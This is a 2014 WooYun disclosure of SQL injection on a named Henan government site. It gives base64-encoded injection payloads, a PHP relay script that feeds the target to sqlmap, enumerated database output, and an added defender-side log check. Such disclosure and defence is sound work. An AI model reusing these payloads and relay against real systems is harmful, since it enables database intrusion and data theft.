WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
WooYun Drops articles online: http://drop.zone.ci/
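2014-07-30: Details reported to the vendor; awaiting vendor handling
2014-08-04: Vendor confirmed; details disclosed to the vendor only
2014-08-14: Details disclosed to core white hats and relevant domain experts
2014-08-24: Details disclosed to regular white hats
2014-09-03: Details disclosed to intern white hats
2014-09-13: Details disclosed to the public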
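Henan Science and Technology Network: http://www.hnkjt.gov.cn/
dataId=MzQxNw== base64-decodes to 3417. Base64-encoding 3417' gives MzQxNyc=, and the page renders abnormally.
Base64-encoding 3417 and 1=1 gives MzQxNyBhbmQgMT0x, and the page renders normally. The differing responses show that the decoded value reaches the SQL query unsanitized.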
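A defender-side check for the behaviour described above, added here as an example (not part of the original report): it base64-decodes dataId from access-log lines and flags any value that is not a plain integer. The log lines, client addresses and function names are constructed for illustration; the same decode_data_id check can serve as server-side validation in front of a parameterized query.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# A legitimate identifier is 1-10 ASCII digits and nothing else.
_ID_RE = re.compile(r"[0-9]{1,10}")
_REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[0-9.]+"')

# Constructed access-log lines; the dataId values are the three from the report.
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Jul/2014:10:00:01 +0800] "GET /new/allListDetail.eiip?cid=1&dataId=MzQxNw== HTTP/1.1" 200 5120',
    '192.0.2.44 - - [30/Jul/2014:10:00:07 +0800] "GET /new/allListDetail.eiip?cid=1&dataId=MzQxNyc= HTTP/1.1" 500 312',
    '192.0.2.44 - - [30/Jul/2014:10:00:09 +0800] "GET /new/allListDetail.eiip?cid=1&dataId=MzQxNyBhbmQgMT0x HTTP/1.1" 200 5120',
]


def decode_data_id(value):
    """Base64-decode a dataId and return it as int; raise ValueError otherwise."""
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except ValueError as exc:  # binascii.Error and UnicodeDecodeError are ValueErrors
        raise ValueError("dataId is not valid base64/ASCII") from exc
    if not _ID_RE.fullmatch(text):
        raise ValueError(f"dataId decodes to non-numeric value: {text!r}")
    return int(text)


def flag_requests(log_lines, param="dataId"):
    """Return (request_target, reason) for each request whose dataId fails validation."""
    findings = []
    for line in log_lines:
        match = _REQ_RE.search(line)
        if not match:
            continue
        target = match.group(1)
        query = urlsplit(target).query
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            try:
                decode_data_id(value)
            except ValueError as exc:
                findings.append((target, str(exc)))
    return findings


if __name__ == "__main__":
    for path, reason in flag_requests(SAMPLE_LOG):
        print(f"SUSPICIOUS {path}: {reason}")
```

A pattern-matching filter that inspects only the raw query string sees neither the quote nor the boolean condition, which is why the check has to run on the decoded value.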
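Enumerating columns
Dumping database information
Enumerating databases
Enumerating tables this way did not return anything, so a relay script was used instead: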
<?php
// Relay: base64-encodes the id parameter and forwards the request to the target
header("Content-type: text/html; charset=gb2312");
set_time_limit(0);
$id = $_GET["id"];
$id = base64_encode($id);
$url = "http://www.hnkjt.gov.cn/new/allListDetail.eiip?cid=1&dataId=" . $id;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>
Access http://host/xx.php?id=3417 and feed it to sqlmap.
System information
web server operating system: Windows
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0.11
Databases
available databases [5]:
[*] cxqybak
[*] hnkjwdb_old
[*] hnsti_cn_db
[*] information_schema
[*] mysql
The same as the databases enumerated earlier.
Database: cxqybak
[188 tables]
Database: hnsti_cn_db
[86 tables]
Database: hnkjwdb_old
[190 tables]
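Severity: Medium
Vulnerability Rank: 10
Confirmed: 2014-08-04 09:49
CNVD confirmed and reproduced the situation described; it has been forwarded by CNCERT to the Henan sub-center for handling.
None yet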